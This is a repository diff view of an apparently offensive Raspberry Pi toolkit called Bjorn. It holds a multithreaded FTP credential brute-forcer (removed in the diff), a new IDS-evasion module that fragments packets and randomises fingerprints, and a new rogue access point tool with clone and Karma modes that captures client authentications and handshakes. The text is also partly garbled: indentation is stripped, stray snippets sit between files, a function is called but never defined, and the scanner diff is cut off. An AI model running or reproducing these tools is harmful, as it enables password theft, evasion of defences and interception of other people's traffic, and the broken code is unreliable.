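work.join()                                 # block until every queued attempt was processed
print(found[0], hits)                       # True [('admin', 'admin')]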

View File

@@ -1,190 +0,0 @@
import os
import pandas as pd
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from ftplib import FTP
from queue import Queue
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_connector.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_connector"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
class FTPBruteforce:
"""
This class handles the FTP brute force attack process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_connector = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""
Initiates the brute force attack on the given IP and port.
"""
return self.ftp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Executes the brute force attack and updates the shared data status.
"""
self.shared_data.bjornorch_status = "FTPBruteforce"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""
This class manages the FTP connection attempts using different usernames and passwords.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.ftpfile = shared_data.ftpfile
if not os.path.exists(self.ftpfile):
logger.info(f"File {self.ftpfile} does not exist. Creating...")
with open(self.ftpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for FTP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
def ftp_connect(self, adresse_ip, user, password):
"""
Attempts to connect to the FTP server using the provided username and password.
"""
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
conn.quit()
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords) + 1 # Include one for the anonymous attempt
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing FTP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Saves the results of successful FTP connections to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.ftpfile, index=False, mode='a', header=not os.path.exists(self.ftpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Removes duplicate entries from the results file.
"""
df = pd.read_csv(self.ftpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.ftpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ftp_bruteforce = FTPBruteforce(shared_data)
logger.info("[bold green]Starting FTP attack...on port 21[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
ftp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(ftp_bruteforce.ftp_connector.results)}")
exit(len(ftp_bruteforce.ftp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

318
actions/heimdall_guard.py Normal file
View File

@@ -0,0 +1,318 @@
# Stealth operations module for IDS/IPS evasion and traffic manipulation.
# Saves settings in `/home/bjorn/.settings_bjorn/heimdall_guard_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --interface Network interface to use (default: active interface).
# -m, --mode Operating mode (timing, random, fragmented, all).
# -d, --delay Base delay between operations in seconds (default: 1).
# -r, --randomize Randomization factor for timing (default: 0.5).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stealth).
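# Example invocation (illustrative, using the flags documented above):
#   sudo python3 heimdall_guard.py -i wlan0 -m timing -d 2 -r 0.3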
import os
import json
import argparse
from datetime import datetime
import logging
import random
import time
import socket
import struct
import threading
import subprocess  # needed for the ethtool calls in initialize_interface()
from scapy.all import *
from collections import deque
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
b_class = "HeimdallGuard"
b_module = "heimdall_guard"
b_enabled = 0
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stealth"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "heimdall_guard_settings.json")
class HeimdallGuard:
def __init__(self, interface, mode='all', base_delay=1, random_factor=0.5, output_dir=DEFAULT_OUTPUT_DIR):
self.interface = interface
self.mode = mode
self.base_delay = base_delay
self.random_factor = random_factor
self.output_dir = output_dir
self.packet_queue = deque()
self.active = False
self.lock = threading.Lock()
# Statistics
self.stats = {
'packets_processed': 0,
'packets_fragmented': 0,
'timing_adjustments': 0
}
def initialize_interface(self):
"""Configure network interface for stealth operations."""
try:
# Disable NIC offloading features that might interfere with packet manipulation
commands = [
f"ethtool -K {self.interface} tso off", # TCP segmentation offload
f"ethtool -K {self.interface} gso off", # Generic segmentation offload
f"ethtool -K {self.interface} gro off", # Generic receive offload
f"ethtool -K {self.interface} lro off" # Large receive offload
]
for cmd in commands:
try:
subprocess.run(cmd.split(), check=True)
except subprocess.CalledProcessError:
logging.warning(f"Failed to execute: {cmd}")
logging.info(f"Interface {self.interface} configured for stealth operations")
return True
except Exception as e:
logging.error(f"Failed to initialize interface: {e}")
return False
def calculate_timing(self):
"""Calculate timing delays with randomization."""
base = self.base_delay
variation = self.random_factor * base
return max(0, base + random.uniform(-variation, variation))
def fragment_packet(self, packet, mtu=1500):
"""Fragment packets to avoid detection patterns."""
try:
if IP in packet:
# Fragment IP packets
frags = []
payload = bytes(packet[IP].payload)
header_length = len(packet) - len(payload)
max_size = mtu - header_length
# Create fragments
offset = 0
while offset < len(payload):
frag_size = min(max_size, len(payload) - offset)
frag_payload = payload[offset:offset + frag_size]
# Create fragment packet
frag = packet.copy()
frag[IP].flags = 'MF' if offset + frag_size < len(payload) else 0
frag[IP].frag = offset // 8
frag[IP].payload = Raw(frag_payload)
frags.append(frag)
offset += frag_size
return frags
return [packet]
except Exception as e:
logging.error(f"Error fragmenting packet: {e}")
return [packet]
def randomize_ttl(self, packet):
"""Randomize TTL values to avoid fingerprinting."""
if IP in packet:
ttl_values = [32, 64, 128, 255] # Common TTL values
packet[IP].ttl = random.choice(ttl_values)
return packet
def modify_tcp_options(self, packet):
"""Modify TCP options to avoid fingerprinting."""
if TCP in packet:
# Common window sizes
window_sizes = [8192, 16384, 32768, 65535]
packet[TCP].window = random.choice(window_sizes)
# Randomize TCP options
tcp_options = []
# MSS option
mss_values = [1400, 1460, 1440]
tcp_options.append(('MSS', random.choice(mss_values)))
# Window scale
if random.random() < 0.5:
tcp_options.append(('WScale', random.randint(0, 14)))
# SACK permitted
if random.random() < 0.5:
tcp_options.append(('SAckOK', ''))
packet[TCP].options = tcp_options
return packet
def process_packet(self, packet):
"""Process a packet according to stealth settings."""
processed_packets = []
try:
if self.mode in ['all', 'fragmented']:
fragments = self.fragment_packet(packet)
processed_packets.extend(fragments)
self.stats['packets_fragmented'] += len(fragments) - 1
else:
processed_packets.append(packet)
# Apply additional stealth techniques
final_packets = []
for pkt in processed_packets:
pkt = self.randomize_ttl(pkt)
pkt = self.modify_tcp_options(pkt)
final_packets.append(pkt)
self.stats['packets_processed'] += len(final_packets)
return final_packets
except Exception as e:
logging.error(f"Error processing packet: {e}")
return [packet]
def send_packet(self, packet):
"""Send packet with timing adjustments."""
try:
if self.mode in ['all', 'timing']:
delay = self.calculate_timing()
time.sleep(delay)
self.stats['timing_adjustments'] += 1
send(packet, iface=self.interface, verbose=False)
except Exception as e:
logging.error(f"Error sending packet: {e}")
def packet_processor_thread(self):
"""Process packets from the queue."""
while self.active:
try:
if self.packet_queue:
packet = self.packet_queue.popleft()
processed_packets = self.process_packet(packet)
for processed in processed_packets:
self.send_packet(processed)
else:
time.sleep(0.1)
except Exception as e:
logging.error(f"Error in packet processor thread: {e}")
def start(self):
"""Start stealth operations."""
if not self.initialize_interface():
return False
self.active = True
self.processor_thread = threading.Thread(target=self.packet_processor_thread)
self.processor_thread.start()
return True
def stop(self):
"""Stop stealth operations."""
self.active = False
if hasattr(self, 'processor_thread'):
self.processor_thread.join()
self.save_stats()
def queue_packet(self, packet):
"""Queue a packet for processing."""
self.packet_queue.append(packet)
def save_stats(self):
"""Save operation statistics."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
stats_file = os.path.join(self.output_dir, f"stealth_stats_{timestamp}.json")
with open(stats_file, 'w') as f:
json.dump({
'timestamp': datetime.now().isoformat(),
'interface': self.interface,
'mode': self.mode,
'stats': self.stats
}, f, indent=4)
logging.info(f"Statistics saved to {stats_file}")
except Exception as e:
logging.error(f"Failed to save statistics: {e}")
def save_settings(interface, mode, base_delay, random_factor, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"mode": mode,
"base_delay": base_delay,
"random_factor": random_factor,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Stealth operations module")
parser.add_argument("-i", "--interface", help="Network interface to use")
parser.add_argument("-m", "--mode", choices=['timing', 'random', 'fragmented', 'all'],
default='all', help="Operating mode")
parser.add_argument("-d", "--delay", type=float, default=1, help="Base delay between operations")
parser.add_argument("-r", "--randomize", type=float, default=0.5, help="Randomization factor")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
mode = args.mode or settings.get("mode")
base_delay = args.delay or settings.get("base_delay")
random_factor = args.randomize or settings.get("random_factor")
output_dir = args.output or settings.get("output_dir")
if not interface:
interface = conf.iface
logging.info(f"Using default interface: {interface}")
save_settings(interface, mode, base_delay, random_factor, output_dir)
guard = HeimdallGuard(
interface=interface,
mode=mode,
base_delay=base_delay,
random_factor=random_factor,
output_dir=output_dir
)
try:
if guard.start():
logging.info("Heimdall Guard started. Press Ctrl+C to stop.")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping Heimdall Guard...")
guard.stop()
if __name__ == "__main__":
main()
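calculate_timing() above jitters each send delay around base_delay by up to random_factor * base_delay, clamped at zero. The same arithmetic in isolation (numbers chosen purely for illustration):

import random

def calculate_timing(base_delay: float, random_factor: float) -> float:
    # Mirrors HeimdallGuard.calculate_timing(): uniform jitter around the base, never negative.
    variation = random_factor * base_delay
    return max(0.0, base_delay + random.uniform(-variation, variation))

# With base_delay=1 and random_factor=0.5 every delay falls in [0.5, 1.5] seconds.
print([round(calculate_timing(1.0, 0.5), 2) for _ in range(5)])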

View File

@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone"
b_module = "log_standalone"
b_status = "log_standalone"
b_port = 0 # Indicate this is a standalone action
class LogStandalone:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

View File

@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone2.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone2"
b_module = "log_standalone2"
b_status = "log_standalone2"
b_port = 0 # Indicate this is a standalone action
class LogStandalone2:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

467
actions/loki_deceiver.py Normal file
View File

@@ -0,0 +1,467 @@
# WiFi deception tool for creating malicious access points and capturing authentications.
# Saves settings in `/home/bjorn/.settings_bjorn/loki_deceiver_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --interface Wireless interface for AP creation (default: wlan0).
# -s, --ssid SSID for the fake access point (or target to clone).
# -c, --channel WiFi channel (default: 6).
# -p, --password Optional password for WPA2 AP.
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/wifi).
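# Example invocation (illustrative): sudo python3 loki_deceiver.py -i wlan0 -s "FreeWiFi" -c 6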
import os
import json
import argparse
from datetime import datetime
import logging
import subprocess
import signal
import time
import re
import threading
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
from scapy.layers.eap import EAPOL  # EAPOL frames are matched in process_packet()
b_class = "LokiDeceiver"
b_module = "loki_deceiver"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/wifi"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "loki_deceiver_settings.json")
class LokiDeceiver:
    def __init__(self, interface, ssid, channel=6, password=None, output_dir=DEFAULT_OUTPUT_DIR,
                 captive_portal=False, karma=False, beacon_interval=100, max_clients=10):
        self.interface = interface
        self.ssid = ssid
        self.channel = channel
        self.password = password
        self.output_dir = output_dir
        # Advanced options forwarded from main(); stored so the AP logic can use them.
        self.captive_portal = captive_portal
        self.karma = karma
        self.beacon_interval = beacon_interval
        self.max_clients = max_clients
        self.original_mac = None
        self.captured_handshakes = []
        self.captured_credentials = []
        self.active = False
        self.lock = threading.Lock()
def setup_interface(self):
"""Configure wireless interface for AP mode."""
try:
# Kill potentially interfering processes
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Stop NetworkManager
subprocess.run(['sudo', 'systemctl', 'stop', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Save original MAC
self.original_mac = self.get_interface_mac()
# Enable monitor mode
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'monitor', 'none'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info(f"Interface {self.interface} configured in monitor mode")
return True
except Exception as e:
logging.error(f"Failed to setup interface: {e}")
return False
def get_interface_mac(self):
"""Get the MAC address of the wireless interface."""
try:
result = subprocess.run(['ip', 'link', 'show', self.interface],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if result.returncode == 0:
mac = re.search(r'link/ether ([0-9a-f:]{17})', result.stdout)
if mac:
return mac.group(1)
except Exception as e:
logging.error(f"Failed to get interface MAC: {e}")
return None
def create_ap_config(self):
"""Create configuration for hostapd."""
try:
config = [
'interface=' + self.interface,
'driver=nl80211',
'ssid=' + self.ssid,
'hw_mode=g',
'channel=' + str(self.channel),
'macaddr_acl=0',
'ignore_broadcast_ssid=0'
]
if self.password:
config.extend([
'auth_algs=1',
'wpa=2',
'wpa_passphrase=' + self.password,
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
config_path = '/tmp/hostapd.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
return config_path
except Exception as e:
logging.error(f"Failed to create AP config: {e}")
return None
def setup_dhcp(self):
"""Configure DHCP server using dnsmasq."""
try:
config = [
'interface=' + self.interface,
'dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
config_path = '/tmp/dnsmasq.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
# Configure interface IP
subprocess.run(['sudo', 'ifconfig', self.interface, '192.168.1.1', 'netmask', '255.255.255.0'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return config_path
except Exception as e:
logging.error(f"Failed to setup DHCP: {e}")
return None
def start_ap(self):
"""Start the fake access point."""
try:
if not self.setup_interface():
return False
hostapd_config = self.create_ap_config()
dhcp_config = self.setup_dhcp()
if not hostapd_config or not dhcp_config:
return False
# Start hostapd
self.hostapd_process = subprocess.Popen(
['sudo', 'hostapd', hostapd_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start dnsmasq
self.dnsmasq_process = subprocess.Popen(
['sudo', 'dnsmasq', '-C', dhcp_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.active = True
logging.info(f"Access point {self.ssid} started on channel {self.channel}")
# Start packet capture
self.start_capture()
return True
except Exception as e:
logging.error(f"Failed to start AP: {e}")
return False
def start_capture(self):
"""Start capturing wireless traffic."""
try:
# Start tcpdump for capturing handshakes
handshake_path = os.path.join(self.output_dir, 'handshakes')
os.makedirs(handshake_path, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
pcap_file = os.path.join(handshake_path, f"capture_{timestamp}.pcap")
self.tcpdump_process = subprocess.Popen(
['sudo', 'tcpdump', '-i', self.interface, '-w', pcap_file],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start sniffing in a separate thread
self.sniffer_thread = threading.Thread(target=self.packet_sniffer)
self.sniffer_thread.start()
except Exception as e:
logging.error(f"Failed to start capture: {e}")
def packet_sniffer(self):
"""Sniff and process packets."""
try:
scapy.sniff(iface=self.interface, prn=self.process_packet, store=0,
stop_filter=lambda p: not self.active)
except Exception as e:
logging.error(f"Sniffer error: {e}")
def process_packet(self, packet):
"""Process captured packets."""
try:
if packet.haslayer(Dot11):
# Process authentication attempts
if packet.type == 0 and packet.subtype == 11: # Authentication
self.process_auth(packet)
# Process association requests
elif packet.type == 0 and packet.subtype == 0: # Association request
self.process_assoc(packet)
# Process EAPOL packets for handshakes
elif packet.haslayer(EAPOL):
self.process_handshake(packet)
except Exception as e:
logging.error(f"Error processing packet: {e}")
def process_auth(self, packet):
"""Process authentication packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'auth',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing auth packet: {e}")
def process_assoc(self, packet):
"""Process association packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'assoc',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing assoc packet: {e}")
def process_handshake(self, packet):
"""Process EAPOL packets for handshakes."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_handshakes.append({
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing handshake packet: {e}")
def save_results(self):
"""Save captured data to JSON files."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'ap_info': {
'ssid': self.ssid,
'channel': self.channel,
'interface': self.interface
},
'credentials': self.captured_credentials,
'handshakes': self.captured_handshakes
}
output_file = os.path.join(self.output_dir, f"results_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def cleanup(self):
"""Clean up resources and restore interface."""
try:
self.active = False
# Stop processes
for process in [getattr(self, 'hostapd_process', None), getattr(self, 'dnsmasq_process', None), getattr(self, 'tcpdump_process', None)]:
if process:
process.terminate()
process.wait()
# Restore interface
if self.original_mac:
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'type', 'managed'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Restart NetworkManager
subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info("Cleanup completed")
except Exception as e:
logging.error(f"Error during cleanup: {e}")
def save_settings(interface, ssid, channel, password, output_dir, **extra):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"ssid": ssid,
"channel": channel,
"password": password,
"output_dir": output_dir
        }
        settings.update(extra)  # also persist any advanced options (captive_portal, karma, timeout, ...)
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="WiFi deception tool")
parser.add_argument("-i", "--interface", default="wlan0", help="Wireless interface")
parser.add_argument("-s", "--ssid", help="SSID for fake AP")
parser.add_argument("-c", "--channel", type=int, default=6, help="WiFi channel")
parser.add_argument("-p", "--password", help="WPA2 password")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
# Honeypot options
parser.add_argument("--captive-portal", action="store_true", help="Enable captive portal")
parser.add_argument("--clone-ap", help="SSID to clone and impersonate")
parser.add_argument("--karma", action="store_true", help="Enable Karma attack mode")
# Advanced options
parser.add_argument("--beacon-interval", type=int, default=100, help="Beacon interval in ms")
parser.add_argument("--max-clients", type=int, default=10, help="Maximum number of clients")
parser.add_argument("--timeout", type=int, help="Runtime duration in seconds")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
ssid = args.ssid or settings.get("ssid")
channel = args.channel or settings.get("channel")
password = args.password or settings.get("password")
output_dir = args.output or settings.get("output_dir")
# Load advanced settings
captive_portal = args.captive_portal or settings.get("captive_portal", False)
clone_ap = args.clone_ap or settings.get("clone_ap")
karma = args.karma or settings.get("karma", False)
beacon_interval = args.beacon_interval or settings.get("beacon_interval", 100)
max_clients = args.max_clients or settings.get("max_clients", 10)
timeout = args.timeout or settings.get("timeout")
if not interface:
logging.error("Interface is required. Use -i or save it in settings")
return
# Clone AP if requested
if clone_ap:
logging.info(f"Attempting to clone AP: {clone_ap}")
clone_info = scan_for_ap(interface, clone_ap)
if clone_info:
ssid = clone_info['ssid']
channel = clone_info['channel']
logging.info(f"Successfully cloned AP settings: {ssid} on channel {channel}")
else:
logging.error(f"Failed to find AP to clone: {clone_ap}")
return
# Save all settings
save_settings(
interface=interface,
ssid=ssid,
channel=channel,
password=password,
output_dir=output_dir,
captive_portal=captive_portal,
clone_ap=clone_ap,
karma=karma,
beacon_interval=beacon_interval,
max_clients=max_clients,
timeout=timeout
)
# Create and configure deceiver
deceiver = LokiDeceiver(
interface=interface,
ssid=ssid,
channel=channel,
password=password,
output_dir=output_dir,
captive_portal=captive_portal,
karma=karma,
beacon_interval=beacon_interval,
max_clients=max_clients
)
try:
# Start the deception
if deceiver.start_ap():
logging.info(f"Access point {ssid} started on channel {channel}")
if timeout:
logging.info(f"Running for {timeout} seconds")
time.sleep(timeout)
deceiver.cleanup()
else:
logging.info("Press Ctrl+C to stop")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping Loki Deceiver...")
except Exception as e:
logging.error(f"Unexpected error: {e}")
finally:
deceiver.cleanup()
logging.info("Cleanup completed")
if __name__ == "__main__":
# Set process niceness to high priority
try:
os.nice(-10)
except:
logging.warning("Failed to set process priority. Running with default priority.")
# Start main function
main()
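For reference, the open-AP configuration that create_ap_config() writes to /tmp/hostapd.conf is just a handful of hostapd directives; a quick way to preview it without touching the system (ssid and channel here are example values):

def preview_hostapd_conf(interface: str, ssid: str, channel: int) -> str:
    # Same directives create_ap_config() emits for an open (password-less) access point.
    lines = [
        "interface=" + interface,
        "driver=nl80211",
        "ssid=" + ssid,
        "hw_mode=g",
        "channel=" + str(channel),
        "macaddr_acl=0",
        "ignore_broadcast_ssid=0",
    ]
    return "\n".join(lines)

print(preview_hostapd_conf("wlan0", "FreeWiFi", 6))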

View File

@@ -1,188 +1,408 @@
# nmap_vuln_scanner.py
# This script performs vulnerability scanning using Nmap on specified IP addresses.
# It scans for vulnerabilities on various ports and saves the results and progress.
"""
Vulnerability Scanner Action
Ultra-fast CPE scan (+ CVE via vulners when available),
with an optional "heavy" fallback.
"""
import os
import pandas as pd
import subprocess
import nmap
import json
import logging
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn
from typing import Dict, List, Set, Any, Optional
from datetime import datetime, timedelta
from shared import SharedData
from logger import Logger
logger = Logger(name="nmap_vuln_scanner.py", level=logging.INFO)
logger = Logger(name="NmapVulnScanner.py", level=logging.DEBUG)
b_class = "NmapVulnScanner"
b_module = "nmap_vuln_scanner"
b_status = "vuln_scan"
b_status = "NmapVulnScanner"
b_port = None
b_parent = None
b_action = "normal"
b_service = []
b_trigger = "on_port_change"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 11
b_cooldown = 0
b_enabled = 1
b_rate_limit = None
class NmapVulnScanner:
"""
This class handles the Nmap vulnerability scanning process.
"""
def __init__(self, shared_data):
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE)."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.scan_results = []
self.summary_file = self.shared_data.vuln_summary_file
self.create_summary_file()
logger.debug("NmapVulnScanner initialized.")
self.nm = nmap.PortScanner()
logger.info("NmapVulnScanner initialized")
def create_summary_file(self):
"""
Creates a summary file for vulnerabilities if it does not exist.
"""
if not os.path.exists(self.summary_file):
os.makedirs(self.shared_data.vulnerabilities_dir, exist_ok=True)
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.summary_file, index=False)
# ---------------------------- Public API ---------------------------- #
def update_summary_file(self, ip, hostname, mac, port, vulnerabilities):
"""
Updates the summary file with the scan results.
"""
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
# Read existing data
df = pd.read_csv(self.summary_file)
logger.info(f"🔍 Starting vulnerability scan for {ip}")
self.shared_data.bjorn_orch_status = "NmapVulnScanner"
# Create new data entry
new_data = pd.DataFrame([{"IP": ip, "Hostname": hostname, "MAC Address": mac, "Port": port, "Vulnerabilities": vulnerabilities}])
# Append new data
df = pd.concat([df, new_data], ignore_index=True)
# Remove duplicates based on IP and MAC Address, keeping the last occurrence
df.drop_duplicates(subset=["IP", "MAC Address"], keep='last', inplace=True)
# Save the updated data back to the summary file
df.to_csv(self.summary_file, index=False)
except Exception as e:
